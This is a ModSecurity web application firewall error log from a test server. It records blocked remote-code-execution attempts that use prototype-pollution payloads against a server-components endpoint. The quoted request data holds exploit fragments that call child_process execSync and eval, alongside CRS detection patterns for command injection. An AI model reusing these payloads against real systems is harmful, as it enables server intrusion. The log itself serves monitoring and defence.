[Tue Jan 20 01:30:41.306950 2026] [:error] [pid 1528320] [client 85.11.167.4:40302] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768869041_7606',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsVTS4bNDf7yd7fJvCQAAAAY"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.307081 2026] [:error] [pid 1528320] [client 85.11.167.4:40302] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768869041_7606',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsVTS4bNDf7yd7fJvCQAAAAY"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.307172 2026] [:error] [pid 1528320] [client 85.11.167.4:40302] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1768869041_7606 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsVTS4bNDf7yd7fJvCQAAAAY"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.308231 2026] [:error] [pid 1528320] [client 85.11.167.4:40302] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsVTS4bNDf7yd7fJvCQAAAAY"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.308390 2026] [:error] [pid 1528320] [client 85.11.167.4:40302] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsVTS4bNDf7yd7fJvCQAAAAY"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.504479 2026] [:error] [pid 1528321] [client 85.11.167.4:40306] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768869041',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsTxCe1gl9UcPL4kauwAAAAc"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.504618 2026] [:error] [pid 1528321] [client 85.11.167.4:40306] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768869041',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsTxCe1gl9UcPL4kauwAAAAc"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.504701 2026] [:error] [pid 1528321] [client 85.11.167.4:40306] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1768869041 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsTxCe1gl9UcPL4kauwAAAAc"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.505764 2026] [:error] [pid 1528321] [client 85.11.167.4:40306] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsTxCe1gl9UcPL4kauwAAAAc"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 01:30:41.505951 2026] [:error] [pid 1528321] [client 85.11.167.4:40306] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW7MsTxCe1gl9UcPL4kauwAAAAc"], referer: https://surf.test.indacotrentino.com
[Tue Jan 20 12:06:01.259562 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Rule 7f5e26863898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.259653 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Rule 7f5e26858760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.261344 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.261477 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Rule 7f5e264a9bf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.261642 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.261804 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.263630 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Rule 7f5e270db320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.263772 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Rule 7f5e270d2030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.270719 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 12:06:01.270960 2026] [:error] [pid 1531286] [client 34.61.110.114:56472] [client 34.61.110.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW9hmcv_oo7eqxsqKGb_qwAAAAQ"]
[Tue Jan 20 18:29:55.439834 2026] [:error] [pid 1542465] [client 35.161.234.133:45808] [client 35.161.234.133] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW-7k-ZN_4NVvBKxeUJK9QAAAAg"]
[Tue Jan 20 18:29:55.440503 2026] [:error] [pid 1542465] [client 35.161.234.133:45808] [client 35.161.234.133] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW-7k-ZN_4NVvBKxeUJK9QAAAAg"]
[Tue Jan 20 18:29:55.441883 2026] [:error] [pid 1542465] [client 35.161.234.133:45808] [client 35.161.234.133] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW-7k-ZN_4NVvBKxeUJK9QAAAAg"]
[Tue Jan 20 18:29:55.442060 2026] [:error] [pid 1542465] [client 35.161.234.133:45808] [client 35.161.234.133] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aW-7k-ZN_4NVvBKxeUJK9QAAAAg"]
[Tue Jan 20 20:48:29.712638 2026] [authz_core:error] [pid 1531284] [client 91.224.92.99:56377] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
[Tue Jan 20 22:43:31.011088 2026] [authz_core:error] [pid 1531285] [client 216.81.248.168:56972] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jan 21 18:49:42.417525 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Rule 7f4338c75898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.417642 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Rule 7f4338c6a760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.419348 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.419476 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Rule 7f43388bbbf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.419628 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
